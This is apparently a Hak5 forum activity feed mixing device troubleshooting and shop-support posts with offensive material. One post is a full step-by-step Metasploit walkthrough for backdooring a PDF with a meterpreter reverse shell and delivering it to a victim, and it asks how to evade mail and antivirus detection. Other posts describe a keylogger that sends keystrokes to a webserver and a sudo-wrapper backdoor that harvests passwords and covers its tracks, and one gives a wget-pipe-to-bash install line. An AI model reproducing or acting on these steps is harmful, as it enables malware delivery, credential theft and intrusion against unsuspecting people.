All Activity

This stream auto-updates   

  1. Today
  2. Hello! In this post, I am going to tell you how I embedded a backdoor in a PDF file and uploaded onto the Internet. However, there are still some obscurities that I need YOUR help with. 1. Step: Preparation Download a random pdf file from the internet and save it to the "root directory" (Root directory --> Go to "places" and then "Home" and put it in there) 2. Step: Forging the backdoored file - go to terminal and execute the command "msfconsole" - after that, execute the command "use exploit/windows/fileformat/adobe_pdf_embedded_exe" - after that, execute the command "set payload windows/meterpreter/reverse_tcp" - after that, execute the command "set INFILENAME PutTheNameOfThePdfFileAlongsideWithTheExtensionHere" so for example: set INFILENAME book.pdf - after that, execute the command "set FILENAME DesiredOutputFileName.pdf" so for example: set FILENAME LovePoem.pdf - after that, execute the command "set LHOST IpOfTheAttackerGoesHere(your ip)" - after that, execute the command "exploit" 3. Step: Locating our creation After the backdoor has been successfully embedded to the PDF file, it is stored somewhere in the machine (it tells you where after the file is generated) Open up a terminal and execute "cd FileDestinationWithoutTheFileGoesHere" The output of the created file was: [*] Reading in '/root/book.pdf'... [*] Parsing '/root/book.pdf'... [*] Using 'windows/meterpreter/reverse_tcp' as payload... [*] Parsing Successful. Creating 'LovePoem.pdf' file... [+] LovePoem.pdf stored at /root/.msf4/local/LovePoem.pdf So open up the terminal and type "cd /root/.msf4/local/" After this command is executed, it moves our directory to the specified path. Then, execute the command "ls" to list all the files inside the directory. 4. Step: Copying the file to desktop After the file is located using the cd and ls commands, it has to be copied. - Execute the command: cp /root/.msf4/local/LovePoem.pdf /root/Desktop/ 5. Step: Uploading the file on the web After the file is forged and retrieved to dekstop, it has to be uploaded to the internet. Popular file sharing networks such as MediaFire and Gmail have recognised the infected file, but a file sharing network called "SendSpace" didn't. You can easily upload the file there and send the link to the victim. So now I need your help, to answer me to these questions: 1. After the victim has downloaded the file (let's assume that the antivirus hasn't detected it), how can I gain a remote access to it? (which commands do I need to execute etc. 2. How can I prevent the infected file from being detected by Gmail and Mediafire? 3. How can I prevent the infeted file from being detected by the anti virus? I appreciate all the time taken to read this post or answer any of the questions :D
  3. I'm not a genius in the field, but yes, I'd assume that there would have to be some iptables trickery involved. Either that or port forward the traffic through your LT to the port on your kali box? lmk if you get it working!
  4. Hey all, I'm looking to buy a LT, but I had a few questions, and wanted your guys' thoughts on the ups/downs of the LT. My first question is heat management. Does this heat up? If so, has it ever become a problem for anybody? I'm somewhat concerned because my Bash Bunny get pretty hot if you leave it running for too long. Second, for those who have been apart of the community since the beginning of the LT, what's module development looked like? Is the community active? or have things stalled? I ask this because I'm wondering if there are projects that I can contribute too, when I get a LT. Thirdly, what has your guys' experience with the LT been? Good/Bad? Inbetween? How often do you guys use it? Thanks!
  5. Umm, no. They would basically be a 2.4ghz jammer, which isn't legal. Just use the devices listed.
  6. Please, Please, Please anyone that reads this stop bothering Mubix with sales issues. This: https://hakshop.com/pages/policy
  7. ok, so update. it comes down to timing and just waiting as you said. jayson grabbed my ticket out of the queue and after some explanation and bank statement screencaps, etc. order was pushed through and awaiting delivery. in regards to #3, there is specific instructions for dealing with the fraudulent flag as it is almost a common occurrence as is to be expected. this happened to me using three different cards. so advice to future orders: stick with one card, and follow through. dont just blame your own financial institution. give THEM the hard time as they have more than enough staff to listen to you bitch. give the hak5 shipping team time to get hens in order and then swing back around with them once you get your bank squared away. the timing almost works perfect if they are backlogged.
  8. anyone has a solution ?
  9. @diabolic It's by far my favorite use of the Nano... discrete and you can grab the WPA Handshake and work it offline. Everything else (URLSnarf, SSL, etc.. ) is somewhat intrusive. But this.. it's just brilliant! What has worked for me is installing it to the SD card so there's never a question of space and to go for a Capture that is higher than 50% Quality. Even then (last attempt) it failed to grab Message 3 of 4 for the EPOL but it was close. Like the theads says.. aircrack-ng is the fastest method and works on the Pineapple. Although I think it's much more flawless when a handshake is captured via my laptop than the Nano (both programs saying a handshake was captured).
  10. I'm also having trouble with this on a tetra running FW 1.1.2. Does anyone know what the root cause of this is? It's really annoying having bought this only to have to fall back to a laptop running kali. This is the simplest use case for this device and it consistently fails at it :(
  11. payload

    I'm pumped to try it out! As an fyi, I'm going to work in my spare time on completely hiding the PowerShell window so the target will only see the Win + R box.
  12. No luck over here.. about the same error. It finished.. with errors about not finding directories and such. Could very well be the SD card stuff everybody has mentioned in this thread. Although the card is fine anywhere else and I can get into it via ssh and whatever else. Launch-Mana.. started to see some progress! But ultimately failed hostapd-mana is running with pid: 3234 DHCP Server is running with pid: 3248 SSLstrip+ is running with pid: 3315 DNS2Proxy is running with pid: 3317 Exiting! (Error code: 6) SSLsplit was not launched correctly. Mana Toolkit has been shutdown.
  13. Great idea, well coded, may become really handy, thank you :)
  14. payload

    UPDATE: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger The payload: Is now faster (thanks to @jafahulo) Now supports exfil via a webserver, just copy the backend.php to a server supporting PHP and copy the URI into the powershell script Also, the've been some major changes to the keylogger to make adding future exfil methods (like the wip SMB exfil) easier.
  15. hostapd-mana

    I am unable to mount my USB even when formated as ext4. Have tested with 2 sdcards now and they both fail. Here is my most recent problem: I suppose the problems are related to the sdcards and how the pineapple mounts them. Really sad to see this and when you check the bug list on the pineapple it's filled with sd cards problem. A better guide on how to mount USB would be appreciated, can the problem be due to the fstab? Also when are you rolling MANA out as an official module?
  16. @Zylla Okay.. factory reset, format SD card.. rooted into Pineapple.. running this script now
  17. #1 - mubix, is not the https://hakshop.com/ nor works in the shop/sales #2 - If you put in an email for support, give it time. You(like many others) who have questions for store purchases, often come here, and is in general, only going to get the same answer. Wait and be patient. If you sent them an email, you should have gotten a ticket # of some kind. Keep it handy. They will get back you. As mentioned in other threads, there is a small crew who handles all store issues in general. Be patient. #3 - If payment was declined, probably nothing in there system other than your email. CC issues, I would say is on your CC company's end. Only reason the store would cancel, is if it was declined for funds (is my thinking, but I don't work at hak5, so wait to hear from them). If you already said they picked it up for potential fraud, that is where I would go as it's probably the CC provider who blocked the purchase, or use a different payment method and try again. Since you haven't completed a purchase, you shouldn't have any charges to worry about. If it was canceled by hak5(which this is most likely all automated by the shopping cart stuff) I'd say make sure you can receive emails and nothing gets filtered for spam in case they did send one out about back-orders, etc. Even in back-orders though, I would think you'd get some kind of notice.
  18. Wouldn't it be different in 1.1 while [ ! $TARGET_IP ]; do GET TARGET_IP sleep 1 done
  19. Ding ding, it's payload time This is a two stages payload. First you use the 'injector' that will install a small bash script which is a wrapper for sudo. The script will store the passwords. Second, you use the 'cleaner' to get the passwords back and clean the backdoor. So basically, you get access to a computer running MacOS or Linux (you can config the payload by setting mac=true) and you install the backdoor. A couple of hours/days/weeks later you comme back, grab the passwords and erase traces. Easy Link: https://github.com/oXis/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor I'll submit a pull request but first I need people to test this on MacOS and Linux. It works on my Linux Mint. Ninja!
  20. This seems to be really powerfull when it comes to pranking friends, but since you already could have done it manually, I either didn't hear of it yet or it isn't possible or you are really the first one to think of that attack vector. When it comes to android exfiltration, I would write an exfil app and then push it to the app like Demnsec did or register the bash bunny as storage and then manually install and use an file manager or use ADB to copy the files to the BB.
  21. payload

    The current online version already hides the powershell window, but since @jafahulo reworked the launching, it isn't needed anymore. Your window tracking idea is really interesting, I'm gonna try it after I implemented the web (and maybe the SMB) exfil method.
  22. Yeah, that's a 404 error. The filename is out-dated. The correct filename is: hostapd-mana_2.6-2_ar71xx.ipk I suggest you use the INSTALL.sh script, which will setup everything automatically. (Except the module) You can download it using wget, or just enter this into your terminal: wget -qO- https://raw.githubusercontent.com/adde88/hostapd-mana/master/INSTALL.sh | bash -s -- -v -v
  23. Hi everyone, so the way @Dave-ee Jones asked for is 'best-practice' to check whether the driver e.g. for the the * _ETHERNET - attacks had been successfully installed? And thanks to @qdba for your reply! @Sebkinne: Is there a 'build-in-check' for being ready or is that something for the whishlist?
  24. Hello, I'm unable to find the responder, which I know is required to perform QuickCreds. I even downloaded bashbunny-payloads-master but even then I couldn't find the tools_installer folder. Does anyone know where I can find the responder and how to transfer it to the correct folder, to perform QuickCreds?
  25. Something very useful for beginners. Thanks for the share.
  26. So I have an arduino robot with a bluetooth hc05 module and was like... I should hack this and learn hacking. That was two weeks ago. Now I've seen all Mike Ryans work / youtube, github and other research things for the ubertooth from other people. I've seen the tutorials for Michael Ossmanns Hackrf and SDR. And I've seen Samy's work and specially the drone hacking with his zombie attack where he uses an alfa wifi adapter. after reading a lot about btle, I was about to order an ubertooth, when it hit me, I'm not really interested in bluetooth, even though I've been reading like a maniac. I'm interested in hacking robots. Obviously commercial drones uses much more encrypted protocols and that's not my beginning target. I've search around and doesn't find the answers I'm looking for. So I try here with my first post: What wireless communication protocol uses different robots (rovers and drones or automated machines and anything else robotic related both consumer and commercial? What hacking area should I research and later on purchase hardware for it? is it wifi adapters for pentesting or it software defined radio and a hackrf? is hacking a drone or a rover the same as hacking a computer through a wireless network? and if so what topics is highly relevant to read and work with? Thanks.
  1. Load more activity